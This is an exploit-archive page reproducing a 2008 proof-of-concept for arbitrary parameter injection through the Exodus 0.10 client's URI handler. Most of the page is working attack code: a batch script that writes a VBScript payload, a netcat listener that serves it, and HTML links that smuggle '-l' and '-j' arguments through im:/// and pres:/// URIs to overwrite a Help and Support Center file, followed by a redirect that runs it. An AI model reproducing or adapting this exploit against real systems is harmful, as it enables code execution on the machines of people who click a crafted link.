[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Exodus 0.10 (uri handler) Arbitrary Parameter Injection Exploit
# Published : 2008-11-20
# Author : Nine:Situations:Group
# Previous Title : verlihub <= 0.9.8d-RC2 Remote Command Execution Vulnerability
# Next Title : Google Chrome 1.0.154.43 ClickJacking Vulnerability (2009-01-23)
<!--
Exodus v0.10 remote code execution exploit
by Nine:Situations:Group::strawdog
This uses the "-l" argument to overwrite a file
inside Microsoft Help and Support Center folders (oh rgod...)
Firstly run netcat in listen mode to drop the vbscript shell
run this script:
@echo off
rem dropsh.cmd
echo ^<SCRIPT LANGUAGE="VBScript"^> > testfile
echo Dim wshShell >> testfile
echo Set wshShell = CreateObject("WScript.Shell") >> testfile
echo wshShell.Run("cmd /c start calc") >> testfile
echo ^</SCRIPT^> >> testfile
nc -L -s 192.168.0.1 -p 5222 -vv < testfile
-->
<html>
<head>
<script type="text/javascript">
<!--
function doRedirect() {
location.href = "hcp://system/sysinfo/msinfo.htm";
}
function runcalc() {
window.setTimeout("doRedirect()", 10000);
}
//-->
</script>
<a href="im:///'%20-l%20C:WINDOWSPCHEALTHHELPCTRSystemsysinfomsinfo.htm%20-j%20strawdog@192.168.0.1%20-p%20AAAA%20%00" onClick="runcalc()">click me</a><br>
<a href="pres:///'%20-l%20C:WINDOWSPCHEALTHHELPCTRSystemsysinfomsinfo.htm%20-j%20strawdog@192.168.0.1%20-p%20AAAA%20%00" onClick="runcalc()">click me</a>
</html>
# www.Syue.com [2008-11-20]